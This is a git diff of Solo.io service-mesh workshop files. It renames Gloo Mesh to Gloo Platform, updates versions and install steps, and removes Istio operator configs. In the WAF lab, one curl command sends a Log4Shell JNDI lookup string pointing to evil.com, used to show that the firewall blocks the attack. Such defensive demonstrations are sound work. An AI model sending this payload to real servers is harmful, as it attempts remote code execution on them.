diff --git a/workshops/gloo-gateway-day-2/README.md b/workshops/gloo-gateway-day-2/README.md index 1731a46..b516d02 100644 --- a/workshops/gloo-gateway-day-2/README.md +++ b/workshops/gloo-gateway-day-2/README.md @@ -90,7 +90,6 @@ helm upgrade --install gloo-platform-crds gloo-platform/gloo-platform-crds \ helm install gloo-platform gloo-platform/gloo-platform \ --version=$GLOO_PLATFORM_VERSION \ - --devel \ --namespace=gloo-mesh \ --set licensing.glooMeshLicenseKey=$GLOO_PLATFORM_LICENSE_KEY \ --set licensing.glooTrialLicenseKey=$GLOO_PLATFORM_LICENSE_KEY \ diff --git a/workshops/gloo-mesh-day-2/README.md b/workshops/gloo-mesh-day-2/README.md index 56db3f6..4af5364 100644 --- a/workshops/gloo-mesh-day-2/README.md +++ b/workshops/gloo-mesh-day-2/README.md @@ -45,10 +45,10 @@ Set these environment variables which will be used throughout the workshop. ```sh # Used to enable Gloo (please ask for a trial license key) export GLOO_PLATFORM_LICENSE_KEY= -export GLOO_PLATFORM_VERSION=v2.3.0-rc1 +export GLOO_PLATFORM_VERSION=v2.3.5 export ISTIO_IMAGE_REPO=us-docker.pkg.dev/gloo-mesh/istio-workshops -export ISTIO_IMAGE_TAG=1.16.3-solo -export ISTIO_VERSION=1.16.3 +export ISTIO_IMAGE_TAG=1.16.4-solo +export ISTIO_VERSION=1.16.4 export ISTIO_REVISION=1-16 ``` diff --git a/workshops/gloo-mesh-demo/README.md b/workshops/gloo-mesh-demo/README.md index ceb0fb1..afd6e47 100644 --- a/workshops/gloo-mesh-demo/README.md +++ b/workshops/gloo-mesh-demo/README.md @@ -1,42 +1,42 @@ -![Gloo Mesh Enterprise](images/gloo-mesh-2.0-banner.png) +![Gloo Platform](images/gloo-mesh-2.0-banner.png) -#
Gloo Mesh Online Boutique Demo Workshop
+#
Gloo Platform Online Boutique Demo Workshop
## Table of Contents * [Introduction](#introduction) * [Lab 1 - Deploy Kubernetes clusters](#Lab-1) -* [Lab 2 - Deploy Gloo Mesh](#Lab-2) +* [Lab 2 - Deploy Gloo Platform](#Lab-2) * [Lab 3 - Deploy Istio](#Lab-3) * [Lab 4 - Deploy Online Boutique Sample Application](#Lab-4) -* [Lab 5 - Configure Gloo Mesh Workspaces](#Lab-5) +* [Lab 5 - Configure Gloo Platform Workspaces](#Lab-5) * [Lab 6 - Expose the Online Boutique Frontend](#Lab-6) * [Lab 7 - Lock it down! Zero Trust Networking](#Lab-7) * [Lab 8 - Multi-cluster Routing](#Lab-8) * [Lab 9 - Multi-cluster Failover](#Lab-9) -* [Lab 10 - Gloo Mesh Gateway](#Lab-10) +* [Lab 10 - Gloo Gateway](#Lab-10) ## Introduction -[Gloo Mesh Enterprise](https://www.solo.io/products/gloo-mesh/) simplifies the adoption of a service mesh across single or many clusters. It is Enterprise [Istio](https://istio.io) with production support, N-4 support, CVE patching, FIPS builds, and a multi-cluster operational management plane to simplify running a service mesh across multiple clusters or a hybrid deployment. +[Gloo Platform](https://www.solo.io/products/gloo-mesh/) simplifies the adoption of a service mesh across single or many clusters. It is Enterprise [Istio](https://istio.io) with production support, N-4 support, CVE patching, FIPS builds, and a multi-cluster operational management plane to simplify running a service mesh across multiple clusters or a hybrid deployment. -Gloo Mesh also has features around multi-tenancy, global failover and routing, observability, and east-west rate limiting and policy enforcement (through AuthZ/AuthN plugins). +Gloo Platform also has features around multi-tenancy, global failover and routing, observability, and east-west rate limiting and policy enforcement (through AuthZ/AuthN plugins). -![Gloo Mesh Value](images/gloo-mesh-value.png) +![Gloo Platform Value](images/gloo-mesh-value.png) ### Dashboard & Observability -When you install Gloo Mesh Enterprise, you get the Gloo Mesh Dashboard which allows you to review the health and configuration of Gloo Mesh custom resources, including registered clusters, workspaces, networking, policies, and more. +When you install Gloo Platform, you get the Gloo Platform Dashboard which allows you to review the health and configuration of Gloo Platform custom resources, including registered clusters, workspaces, networking, policies, and more. -![Gloo Mesh graph](images/gloo-mesh-ui.png) +![Gloo Platform graph](images/gloo-mesh-ui.png) -Gloo Mesh uses agents to consolidate all the metrics and access logs from the different clusters. A Service Graph can then be used to monitor all the communication happening globally. +Gloo Platform uses agents to consolidate all the metrics and access logs from the different clusters. A Service Graph can then be used to monitor all the communication happening globally. -![Gloo Mesh graph](images/gloo-mesh-graph.png) +![Gloo Platform graph](images/gloo-mesh-graph.png) -### Want to learn more about Gloo Mesh? +### Want to learn more about Gloo Platform? -You can find more information about Gloo Mesh in the official documentation: +You can find more information about Gloo Platform in the official documentation: [https://docs.solo.io/gloo-mesh/latest/](https://docs.solo.io/gloo-mesh/latest/) @@ -52,14 +52,9 @@ cd solo-cop/workshops/gloo-mesh-demo Set these environment variables which will be used throughout the workshop. ```sh -# Used to enable Gloo Mesh (please ask for a trail license key) +# Used to enable Gloo Platform (please ask for a trail license key) export GLOO_MESH_LICENSE_KEY= -export GLOO_MESH_VERSION=v2.2.4 - -# Istio version information -export ISTIO_IMAGE_REPO=us-docker.pkg.dev/gloo-mesh/istio-workshops -export ISTIO_IMAGE_TAG=1.16.2-solo -export ISTIO_VERSION=1.16.2 +export GLOO_PLATFORM_VERSION=v2.3.1 ``` ## Lab 1 - Configure/Deploy the Kubernetes clusters @@ -88,13 +83,13 @@ kubectl config rename-context ${CLUSTER1} kubectl config rename-context ${CLUSTER2} ``` -## Lab 2 - Deploy Gloo Mesh +## Lab 2 - Deploy Gloo Platform ![Management Plane Architecture](images/gloo-mesh-mgmt-plane.png) -Gloo Mesh provides a management plane to interact with the clusters and services in your service mesh. The management plane exposes port `9900` via gRPC to connect to the Gloo Mesh agents that run in your remote workload clusters. With the management plane, you can easily set up multi-tenancy for your service mesh with workspaces, view the Gloo Mesh resources that you configured by using the Gloo Mesh UI, and collect service mesh metrics to verify the health of your service mesh and find bottlenecks. +Gloo Platform provides a management plane to interact with the clusters and services in your service mesh. The management plane exposes port `9900` via gRPC to connect to the Gloo Platform agents that run in your remote workload clusters. With the management plane, you can easily set up multi-tenancy for your service mesh with workspaces, view the Gloo Platform resources that you configured by using the Gloo Platform UI, and collect service mesh metrics to verify the health of your service mesh and find bottlenecks. -The `meshctl` command line utility provides convenient functions to quickly set up Gloo Mesh, register workload clusters, run sanity checks, and debug issues. Let's start by installing this utility. +The `meshctl` command line utility provides convenient functions to quickly set up Gloo Platform, register workload clusters, run sanity checks, and debug issues. Let's start by installing this utility. 1. Download `meshctl` command line tool and add it to your path @@ -104,33 +99,38 @@ curl -sL https://run.solo.io/meshctl/install | GLOO_MESH_VERSION=${GLOO_MESH_VER export PATH=$HOME/.gloo-mesh/bin:$PATH ``` -In this lab, you install Gloo Mesh in the management plane by using the `meshctl` command line utility. But you can also install it via Helm. Everything that is provided by Gloo Mesh is compatible with a GitOps approach. +In this lab, you install Gloo Platform in the management plane by using the `meshctl` command line utility. But you can also install it via Helm. Everything that is provided by Gloo Platform is compatible with a GitOps approach. -2. Run the following commands to deploy the Gloo Mesh management plane: +2. Run the following commands to deploy the Gloo Platform management plane: ```sh meshctl install \ --kubecontext $MGMT \ - --set mgmtClusterName=$MGMT \ - --license $GLOO_MESH_LICENSE_KEY + --license $GLOO_GATEWAY_LICENSE_KEY \ + --set common.cluster=$MGMT \ + --profiles mgmt-server ``` The management server exposes a grpc endpoint (`kubectl get svc gloo-mesh-mgmt-server -n gloo-mesh --context $MGMT`) which the agents in the workload clusters will connect to. -Use `meshctl` to install the Gloo Mesh agent in the service mesh clusters and register them with the Gloo Mesh management plane. When a cluster is registered with the management plane, the agent is configured with the token and certificate to securely connect to the Gloo Mesh management plane via mutual TLS (mTLS). +Use `meshctl` to install the Gloo Platform agent in the service mesh clusters and register them with the Gloo Platform management plane. When a cluster is registered with the management plane, the agent is configured with the token and certificate to securely connect to the Gloo Platform management plane via mutual TLS (mTLS). -3. Finally, you need to register the two other clusters by deploying the gloo mesh agents. +3. Finally, you need to register the two other clusters by deploying the gloo mesh agents. You will need to provide the telemetry gateway address for metrics to also be connected ```sh +GLOO_TELEMETRY_GATEWAY=$(kubectl get svc -n gloo-mesh gloo-telemetry-gateway --context $MGMT -o jsonpath='{.status.loadBalancer.ingress[0].*}'):$(kubectl --context ${MGMT} -n gloo-mesh get svc gloo-telemetry-gateway -o jsonpath='{.spec.ports[?(@.port==4317)].port}') + meshctl cluster register \ --kubecontext=$MGMT \ --remote-context=$CLUSTER1 \ + --telemetry-server-address $GLOO_TELEMETRY_GATEWAY \ $CLUSTER1 meshctl cluster register \ --kubecontext=$MGMT \ --remote-context=$CLUSTER2 \ + --telemetry-server-address $GLOO_TELEMETRY_GATEWAY \ $CLUSTER2 ``` @@ -143,22 +143,32 @@ meshctl check --kubecontext $MGMT You should see output similar to the following: ```sh -Checking Gloo Mesh Management Cluster Installation --------------------------------------------- +🟢 License status + + INFO gloo-gateway enterprise license expiration is..... + INFO Valid GraphQL license module found + +🟢 CRD version check + -🟢 Gloo Mgmt Server Deployment Status +🟢 Gloo Platform deployment status + +Namespace | Name | Ready | Status +gloo-mesh | gloo-mesh-redis | 1/1 | Healthy +gloo-mesh | gloo-mesh-mgmt-server | 1/1 | Healthy +gloo-mesh | gloo-telemetry-gateway | 1/1 | Healthy +gloo-mesh | prometheus-server | 1/1 | Healthy +gloo-mesh | gloo-mesh-ui | 1/1 | Healthy + +🟢 Mgmt server connectivity to workload agents + +Cluster | Registered | Connected Pod +cluster1 | true | gloo-mesh/gloo-mesh-mgmt-server-84bcc99f5-vbdjl +cluster2 | true | gloo-mesh/gloo-mesh-mgmt-server-84bcc99f5-vbdjl -🟢 Gloo Mgmt Server Connectivity to Agents -+----------+------------+--------------------------------------------------+ -| CLUSTER | REGISTERED | CONNECTED POD | -+----------+------------+--------------------------------------------------+ -| cluster1 | true | gloo-mesh/gloo-mesh-mgmt-server-6c697cb869-48vq7 | -+----------+------------+--------------------------------------------------+ -| cluster2 | true | gloo-mesh/gloo-mesh-mgmt-server-6c697cb869-48vq7 | -+----------+------------+--------------------------------------------------+ ``` -5. In addition, you can verify proper installation by opening the Gloo Mesh Dashboard. It's best to run this command in a separate terminal. +5. In addition, you can verify proper installation by opening the Gloo Platform Dashboard. It's best to run this command in a separate terminal. ```sh meshctl dashboard --kubecontext $MGMT @@ -166,27 +176,19 @@ meshctl dashboard --kubecontext $MGMT ## Lab 3 - Deploy Istio on the Workload Clusters +With a Gloo Platform-managed installation, you no longer need to use istioctl to individually install Istio in each workload cluster. Instead, you can supply IstioOperator configurations in a IstioLifecycleManager resource to your management cluster. Gloo Platform translates this resource into Istio control planes, gateways, and related resources in your registered workload clusters for you. -1. Download [istioctl](https://istio.io/latest/docs/setup/getting-started/) - -```sh -curl -L https://istio.io/downloadIstio | ISTIO_VERSION=${ISTIO_VERSION} sh - -export PATH=$PWD/istio-${ISTIO_VERSION}/bin:$PATH - -istioctl version -``` - -2. Install Istio to each of the remote clusters using Gloo Mesh IstioLifecycleManager and GatewayLifecycleManager. +1. Install Istio to each of the remote clusters using Gloo Platform IstioLifecycleManager and GatewayLifecycleManager. ```sh -kubectl apply -f install/istio/gm-istio.yaml --context $MGMT +kubectl apply -f install/istio/managed-istio.yaml --context $MGMT ``` -3. Verify in the Gloo Mesh Dashboard that the deployed Istio information was discovered. +2. Verify in the Gloo Platform Dashboard that the deployed Istio information was discovered. ![istio-installed](images/istio-installed.png) -4. Apply a RootTustPolicy to tell the management plane to handle setting up a [shared trust](https://docs.solo.io/gloo-mesh-enterprise/latest/setup/prod/certs/federate-identity/) between the two workload clusters. Gloo Mesh will create a common root certificate and issues an intermediate signing certificate authority (CA) to each of the remote clusters that contain a common root. +3. Apply a RootTustPolicy to tell the management plane to handle setting up a [shared trust](https://docs.solo.io/gloo-mesh-enterprise/latest/setup/prod/certs/federate-identity/) between the two workload clusters. Gloo Platform will create a common root certificate and issues an intermediate signing certificate authority (CA) to each of the remote clusters that contain a common root. ```yaml cat << EOF | kubectl --context ${MGMT} apply -f - @@ -203,7 +205,7 @@ spec: EOF ``` -Gloo Mesh can also integrate with various vendor technologies, including Vault, AWSCA, and more to ensure the CA meets your company's requirements. +Gloo Platform can also integrate with various vendor technologies, including Vault, AWSCA, and more to ensure the CA meets your company's requirements. ## Lab 4 - Deploy Online Boutique Sample Application @@ -212,25 +214,39 @@ Gloo Mesh can also integrate with various vendor technologies, including Vault, 1. Deploy the Online Boutique backend microservices to `cluster1` in the `backend-apis` namespace. ```sh -kubectl apply --context $CLUSTER1 -f install/online-boutique/backend-apis.yaml +kubectl create namespace backend-apis --context $CLUSTER1 +kubectl label ns backend-apis istio-injection=enabled --context $CLUSTER1 + +helm install backend-apis --version "5.0.0" oci://us-central1-docker.pkg.dev/solo-test-236622/solo-demos/onlineboutique \ + --create-namespace \ + --kube-context $CLUSTER1 \ + --namespace backend-apis \ + -f install/online-boutique/backend-apis-values.yaml ``` 2. Deploy the frontend microservice to the `web-ui` namespace in `cluster1`. ```sh -kubectl apply --context $CLUSTER1 -f install/online-boutique/web-ui.yaml +kubectl create namespace web-ui --context $CLUSTER1 +kubectl label ns web-ui istio-injection=enabled --context $CLUSTER1 + +helm install backend-apis --version "5.0.0" oci://us-central1-docker.pkg.dev/solo-test-236622/solo-demos/onlineboutique \ + --create-namespace \ + --kube-context $CLUSTER1 \ + --namespace web-ui \ + -f install/online-boutique/web-ui-values.yaml ``` -## Lab 5 - Configure Gloo Mesh Workspaces +## Lab 5 - Configure Gloo Platform Workspaces -In this lab, you'll learn about the Gloo Mesh **Workspaces** feature. Workspaces bring multi-tenancy controls to Istio. With workspaces, you can explore how multiple personas can work inside the service mesh independently without conflicting with each others configuration. +In this lab, you'll learn about the Gloo Platform **Workspaces** feature. Workspaces bring multi-tenancy controls to Istio. With workspaces, you can explore how multiple personas can work inside the service mesh independently without conflicting with each others configuration. -Imagine that you have the following teams. Each team represents a "tenant" in Gloo Mesh. +Imagine that you have the following teams. Each team represents a "tenant" in Gloo Platform. - The Ops team, who is responsible for the platform and ingress traffic. - The Web team, who is responsible for the frontend web application or client-facing services. - The Backend API team, who is responsible for backend services that power the frontend app. -All the workspaces are created by using the Gloo Mesh management plane. +All the workspaces are created by using the Gloo Platform management plane. ![online-boutique](images/online-boutique-workspaces.png) @@ -242,7 +258,7 @@ kubectl create namespace web-team --context $MGMT kubectl create namespace backend-apis-team --context $MGMT ``` -2. Apply the workspaces to the Gloo Mesh Management Plane root config namespace `gloo-mesh`. +2. Apply the workspaces to the Gloo Platform Management Plane root config namespace `gloo-mesh`. ```yaml kubectl --context ${MGMT} apply -f - < -In this lab, you learn how Gloo Mesh orchestrates failover with simple and declarative policy definitions that you apply to routes defined in your `RouteTables`. +In this lab, you learn how Gloo Platform orchestrates failover with simple and declarative policy definitions that you apply to routes defined in your `RouteTables`. ![Multicluster Failover](images/multicluster-failover-banner.png) 1. Deploy the frontend application to `cluster2` as well. ```sh -kubectl apply --context $CLUSTER2 -f install/online-boutique/web-ui-cluster2.yaml +kubectl create namespace web-ui --context $CLUSTER2 +kubectl label ns web-ui istio-injection=enabled --context $CLUSTER2 + +helm install ha-frontend --version "5.0.0" oci://us-central1-docker.pkg.dev/solo-test-236622/solo-demos/onlineboutique \ + --create-namespace \ + --kube-context $CLUSTER2 \ + --namespace web-ui \ + -f install/online-boutique/web-ui-cluster2-values.yaml ``` -In order to see the full power of Gloo Mesh failover policies, make sure that the frontend application is available on both clusters. To do so, create a `VirtualDestination` for frontend as well. +In order to see the full power of Gloo Platform failover policies, make sure that the frontend application is available on both clusters. To do so, create a `VirtualDestination` for frontend as well. 2. Create VirtualDestination for frontend application @@ -591,7 +621,7 @@ Review the following update to the `RouteTable` resource. You must configure the for i in {1..6}; do curl -sSk http://$GLOO_GATEWAY | grep "Cluster Name:"; done ``` -5. You can create a Gloo Mesh `FailoverPolicy` custom resource to configure locality-based load balancing across your virtual destinations. Apply this policy now. +5. You can create a Gloo Platform `FailoverPolicy` custom resource to configure locality-based load balancing across your virtual destinations. Apply this policy now. ```yaml kubectl --context ${MGMT} apply -f - < -Gloo Mesh Gateway adds API gateway features directly into the Istio ingress gateway. This way, you don't need an external API gateway or extra hops in your cluster to manage features like OIDC, WAF, rate limiting, and more. +Gloo Platform Gateway adds API gateway features directly into the Istio ingress gateway. This way, you don't need an external API gateway or extra hops in your cluster to manage features like OIDC, WAF, rate limiting, and more. -In this lab, you explore just a few of these features to see how powerful adding Gloo Mesh Gateway to your service mesh is. +In this lab, you explore just a few of these features to see how powerful adding Gloo Platform Gateway to your service mesh is. -In order to use the various features of the Gloo Mesh gateway you will need to deploy the `Gloo Mesh Addons` package which has the components to use features such as `rate limiting` and `external authorization`. +In order to use the various features of the Gloo Platform gateway you will need to deploy the `Gloo Platform Addons` package which has the components to use features such as `rate limiting` and `external authorization`. 1. Install the `gloo-mesh-addons` package in cluster1 ```sh -kubectl --context ${CLUSTER1} create namespace gloo-mesh-addons -kubectl --context ${CLUSTER1} label namespace gloo-mesh-addons istio-injection=enabled - -helm repo add gloo-mesh-agent https://storage.googleapis.com/gloo-mesh-enterprise/gloo-mesh-agent -helm repo update +kubectl --context $CLUSTER1 create namespace gloo-mesh-addons +kubectl --context $CLUSTER1 label namespace gloo-mesh-addons istio-injection=enabled -helm upgrade --install gloo-mesh-agent-addons gloo-mesh-agent/gloo-mesh-agent \ +helm upgrade --install gloo-platform-addons gloo-platform/gloo-platform \ --namespace gloo-mesh-addons \ - --kube-context=${CLUSTER1} \ - --set glooMeshAgent.enabled=false \ - --set rate-limiter.enabled=true \ - --set ext-auth-service.enabled=true \ - --version $GLOO_MESH_VERSION + --kube-context=$CLUSTER1 \ + --set common.cluster=$CLUSTER1 \ + --set rateLimiter.enabled=true \ + --set extAuthService.enabled=true \ + --version $GLOO_PLATFORM_VERSION kubectl apply -f tracks/06-api-gateway/gloo-mesh-addons-servers.yaml --context $MGMT ``` #### Web Application Firewall (WAF) -Gloo Mesh Gateway utilizes OWASP ModSecurity to add WAF features into the ingress gateway. Not only can you enable the [OWASP Core Rule Set](https://owasp.org/www-project-modsecurity-core-rule-set/) easily, but also you can enable many other advanced features to protect your applications. +Gloo Platform Gateway utilizes OWASP ModSecurity to add WAF features into the ingress gateway. Not only can you enable the [OWASP Core Rule Set](https://owasp.org/www-project-modsecurity-core-rule-set/) easily, but also you can enable many other advanced features to protect your applications. In this section of the lab, take a quick look at how to prevent the `log4j` exploit that was discovered in late 2021. For more details, you can review the [Gloo Edge blog](https://www.solo.io/blog/block-log4shell-attacks-with-gloo-edge/) that this implementation is based on. @@ -699,7 +726,7 @@ In this section of the lab, take a quick look at how to prevent the `log4j` expl curl -ikI -X GET -H "User-Agent: \${jndi:ldap://evil.com/x}" http://$GLOO_GATEWAY ``` -3. With the Gloo Mesh WAF policy custom resource, you can create reusable policies for ModSecurity. Review the `log4j` WAF policy and the frontend route table. Note the following settings. +3. With the Gloo Platform WAF policy custom resource, you can create reusable policies for ModSecurity. Review the `log4j` WAF policy and the frontend route table. Note the following settings. * In the route table, the frontend route has the label `virtual-destination: frontend`. The WAF policy applies to routes with this same label. * In the WAF policy config, the default core rule set is disabled. Instead, a custom rule set is created for the `log4j` attack. @@ -751,7 +778,7 @@ Your frontend app is no longer susceptible to `log4j` attacks, nice! #### External Authorization (OIDC) -Another valuable feature of API gateways is integration into your IdP (Identity Provider). In this section of the lab, we see how Gloo Mesh Gateway can be configured to redirect unauthenticated users via OIDC. We will use Keycloak as our IdP, but you could use other OIDC-compliant providers in your production clusters. +Another valuable feature of API gateways is integration into your IdP (Identity Provider). In this section of the lab, we see how Gloo Platform Gateway can be configured to redirect unauthenticated users via OIDC. We will use Keycloak as our IdP, but you could use other OIDC-compliant providers in your production clusters. 1. In order for OIDC to work we need to enable HTTPS on our gateway. For this demo, we will create and upload a self-signed certificate which will be used in the gateway for TLS termination. @@ -803,8 +830,8 @@ EOF 3. Test out the new HTTPS endpoint (you may need to allow insecure traffic in your browser. Chrome: Advanced -> Proceed) ```sh -export GLOO_GATEWAY=$(kubectl --context ${CLUSTER1} -n istio-ingress get svc istio-ingressgateway -o jsonpath='{.status.loadBalancer.ingress[0].*}'):443 -echo "Secure Online Boutique URL: https://$GLOO_GATEWAY" +export GLOO_GATEWAY_HTTPS=$(kubectl --context ${CLUSTER1} -n istio-ingress get svc istio-ingressgateway -o jsonpath='{.status.loadBalancer.ingress[0].*}'):443 +echo "Secure Online Boutique URL: https://$GLOO_GATEWAY_HTTPS" ``` 4. Finally, we need to deploy our OIDC server keycloak. We provided you with a script to deploy and configure keycloak for our workshop. @@ -856,7 +883,7 @@ And the application is now accessible. ### 3. Add Rate Limiting -Secondly, we will look at rate limiting with Gloo Mesh Gateway. The rate limiting feature relies on a rate limit server that has been installed in our gloo-mesh-addons namespace. +Secondly, we will look at rate limiting with Gloo Platform Gateway. The rate limiting feature relies on a rate limit server that has been installed in our gloo-mesh-addons namespace. For rate limiting, we need to create three CRs. Let's start with the `RateLimitClientConfig`. @@ -938,7 +965,7 @@ kubectl --context ${MGMT} delete ExtAuthPolicy frontend -n web-team * Test Rate Limiting ```sh -for i in {1..6}; do curl -iksS -X GET https://$GLOO_GATEWAY | tail -n 10; done +for i in {1..6}; do curl -iksS -X GET https://$GLOO_GATEWAY_HTTPS | tail -n 10; done ``` * Expected Response - If you try the Online Boutique UI you will see a blank page because the rate-limit response is in the headers diff --git a/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster1.yaml b/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster1.yaml deleted file mode 100755 index 00ac141..0000000 --- a/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster1.yaml +++ /dev/null @@ -1,99 +0,0 @@ -apiVersion: install.istio.io/v1alpha1 -kind: IstioOperator -metadata: - name: gloo-mesh-istio - namespace: istio-system -spec: - # Start with just the basic control plane, customize and add gateways - profile: minimal - - meshConfig: - # enable access logging to standard output - accessLogFile: /dev/stdout - - defaultConfig: - # wait for the istio-proxy to start before application pods - holdApplicationUntilProxyStarts: true - # enable Gloo Mesh metrics service (required for Gloo Mesh UI) - envoyMetricsService: - address: gloo-mesh-agent.gloo-mesh:9977 - # enable GlooMesh accesslog service (required for Gloo Mesh Access Logging) - envoyAccessLogService: - address: gloo-mesh-agent.gloo-mesh:9977 - proxyMetadata: - # Enable Istio agent to handle DNS requests for known hosts - # Unknown hosts will automatically be resolved using upstream dns servers in resolv.conf - # (for proxy-dns) - ISTIO_META_DNS_CAPTURE: "true" - # Enable automatic address allocation (for proxy-dns) - ISTIO_META_DNS_AUTO_ALLOCATE: "true" - # Used for gloo mesh metrics aggregation - # should match trustDomain (required for Gloo Mesh UI) - GLOO_MESH_CLUSTER_NAME: cluster1 - # Specify if http1.1 connections should be upgraded to http2 by default. - # Can be overridden using DestinationRule - h2UpgradePolicy: UPGRADE - - # The trust domain corresponds to the trust root of a system. - # For Gloo Mesh this should be the name of the cluster that cooresponds with the CA certificate CommonName identity - trustDomain: cluster1.solo.io - components: - ingressGateways: - # enable the default ingress gateway - - name: istio-ingressgateway - namespace: istio-ingress - enabled: true - k8s: - service: - type: LoadBalancer - ports: - # main http ingress port - - port: 80 - targetPort: 8080 - name: http2 - # main https ingress port - - port: 443 - targetPort: 8443 - name: https - - name: istio-eastwestgateway - enabled: true - namespace: istio-eastwest - label: - istio: eastwestgateway - k8s: - env: - # Required by Gloo Mesh for east/west routing - - name: ISTIO_META_ROUTER_MODE - value: "sni-dnat" - service: - type: LoadBalancer - selector: - istio: eastwestgateway - # Default ports - ports: - # Port for multicluster mTLS passthrough; required for Gloo Mesh east/west routing - - port: 15443 - targetPort: 15443 - # Gloo Mesh looks for this default name 'tls' on a gateway - name: tls - pilot: - k8s: - env: - # Allow multiple trust domains (Required for Gloo Mesh east/west routing) - - name: PILOT_SKIP_VALIDATE_TRUST_DOMAIN - value: "true" - # disable associating workload entries with kube services - - name: PILOT_ENABLE_K8S_SELECT_WORKLOAD_ENTRIES - value: "false" - values: - gateways: - istio-ingressgateway: - # Enable gateway injection - injectionTemplate: gateway - # https://istio.io/v1.5/docs/reference/config/installation-options/#global-options - global: - # needed for connecting VirtualMachines to the mesh - network: cluster1 - # needed for annotating istio metrics with cluster (should match trust domain and GLOO_MESH_CLUSTER_NAME) - multiCluster: - clusterName: cluster1 diff --git a/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster2.yaml b/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster2.yaml deleted file mode 100755 index 7ddf7d6..0000000 --- a/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster2.yaml +++ /dev/null @@ -1,99 +0,0 @@ -apiVersion: install.istio.io/v1alpha1 -kind: IstioOperator -metadata: - name: gloo-mesh-istio - namespace: istio-system -spec: - # Start with just the basic control plane, customize and add gateways - profile: minimal - - meshConfig: - # enable access logging to standard output - accessLogFile: /dev/stdout - - defaultConfig: - # wait for the istio-proxy to start before application pods - holdApplicationUntilProxyStarts: true - # enable Gloo Mesh metrics service (required for Gloo Mesh UI) - envoyMetricsService: - address: gloo-mesh-agent.gloo-mesh:9977 - # enable GlooMesh accesslog service (required for Gloo Mesh Access Logging) - envoyAccessLogService: - address: gloo-mesh-agent.gloo-mesh:9977 - proxyMetadata: - # Enable Istio agent to handle DNS requests for known hosts - # Unknown hosts will automatically be resolved using upstream dns servers in resolv.conf - # (for proxy-dns) - ISTIO_META_DNS_CAPTURE: "true" - # Enable automatic address allocation (for proxy-dns) - ISTIO_META_DNS_AUTO_ALLOCATE: "true" - # Used for gloo mesh metrics aggregation - # should match trustDomain (required for Gloo Mesh UI) - GLOO_MESH_CLUSTER_NAME: cluster2 - # Specify if http1.1 connections should be upgraded to http2 by default. - # Can be overridden using DestinationRule - h2UpgradePolicy: UPGRADE - - # The trust domain corresponds to the trust root of a system. - # For Gloo Mesh this should be the name of the cluster that cooresponds with the CA certificate CommonName identity - trustDomain: cluster2.solo.io - components: - ingressGateways: - # enable the default ingress gateway - - name: istio-ingressgateway - namespace: istio-ingress - enabled: true - k8s: - service: - type: LoadBalancer - ports: - # main http ingress port - - port: 80 - targetPort: 8080 - name: http2 - # main https ingress port - - port: 443 - targetPort: 8443 - name: https - - name: istio-eastwestgateway - enabled: true - namespace: istio-eastwest - label: - istio: eastwestgateway - k8s: - env: - # Required by Gloo Mesh for east/west routing - - name: ISTIO_META_ROUTER_MODE - value: "sni-dnat" - service: - type: LoadBalancer - selector: - istio: eastwestgateway - # Default ports - ports: - # Port for multicluster mTLS passthrough; required for Gloo Mesh east/west routing - - port: 15443 - targetPort: 15443 - # Gloo Mesh looks for this default name 'tls' on a gateway - name: tls - pilot: - k8s: - env: - # Allow multiple trust domains (Required for Gloo Mesh east/west routing) - - name: PILOT_SKIP_VALIDATE_TRUST_DOMAIN - value: "true" - # disable associating workload entries with kube services - - name: PILOT_ENABLE_K8S_SELECT_WORKLOAD_ENTRIES - value: "false" - values: - gateways: - istio-ingressgateway: - # Enable gateway injection - injectionTemplate: gateway - # https://istio.io/v1.5/docs/reference/config/installation-options/#global-options - global: - # needed for connecting VirtualMachines to the mesh - network: cluster2 - # needed for annotating istio metrics with cluster (should match trust domain and GLOO_MESH_CLUSTER_NAME) - multiCluster: - clusterName: cluster2 diff --git a/workshops/gloo-mesh-demo/install/istio/istiooperator-mgmt.yaml b/workshops/gloo-mesh-demo/install/istio/istiooperator-mgmt.yaml deleted file mode 100755 index 82927f2..0000000 --- a/workshops/gloo-mesh-demo/install/istio/istiooperator-mgmt.yaml +++ /dev/null @@ -1,38 +0,0 @@ -apiVersion: install.istio.io/v1alpha1 -kind: IstioOperator -metadata: - name: gloo-mesh-mgmt-istio - namespace: istio-system -spec: - # only the control plane components are installed (https://istio.io/latest/docs/setup/additional-setup/config-profiles/) - profile: minimal - - meshConfig: - # enable access logging to standard output - accessLogFile: /dev/stdout - - defaultConfig: - # wait for the istio-proxy to start before application pods - holdApplicationUntilProxyStarts: true - # Specify if http1.1 connections should be upgraded to http2 by default. - # Can be overridden using DestinationRule - h2UpgradePolicy: UPGRADE - components: - ingressGateways: - # enable the default ingress gateway - - name: istio-ingressgateway - namespace: istio-system - enabled: true - k8s: - service: - type: LoadBalancer - ports: - # gloo mesh dashboard - - name: http-gm-dashboard - port: 8091 - targetPort: 8091 - values: - gateways: - istio-ingressgateway: - # Enable gateway injection - injectionTemplate: gateway \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/istio/gm-istio.yaml b/workshops/gloo-mesh-demo/install/istio/managed-istio.yaml similarity index 99% rename from workshops/gloo-mesh-demo/install/istio/gm-istio.yaml rename to workshops/gloo-mesh-demo/install/istio/managed-istio.yaml index 0dfbd7e..6701b4a 100644 --- a/workshops/gloo-mesh-demo/install/istio/gm-istio.yaml +++ b/workshops/gloo-mesh-demo/install/istio/managed-istio.yaml @@ -22,7 +22,7 @@ spec: # You get the repo key from your Solo Account Representative. hub: us-docker.pkg.dev/gloo-mesh/istio-workshops # Any Solo.io Gloo Istio tag - tag: 1.16.2-solo + tag: 1.16.4-solo namespace: istio-system # Mesh configuration meshConfig: @@ -89,7 +89,7 @@ spec: # You get the repo key from your Solo Account Representative. hub: us-docker.pkg.dev/gloo-mesh/istio-workshops # The Solo.io Gloo Istio tag - tag: 1.16.2-solo + tag: 1.16.4-solo components: ingressGateways: - enabled: true diff --git a/workshops/gloo-mesh-demo/install/online-boutique/backend-apis-values.yaml b/workshops/gloo-mesh-demo/install/online-boutique/backend-apis-values.yaml new file mode 100644 index 0000000..2f841c9 --- /dev/null +++ b/workshops/gloo-mesh-demo/install/online-boutique/backend-apis-values.yaml @@ -0,0 +1,50 @@ +clusterName: cluster1 + +endpoints: + productCatalogService: 'productcatalogservice.backend-apis.svc.cluster.local:3550' + +images: + repository: gcr.io/solo-test-236622 + # Overrides the image 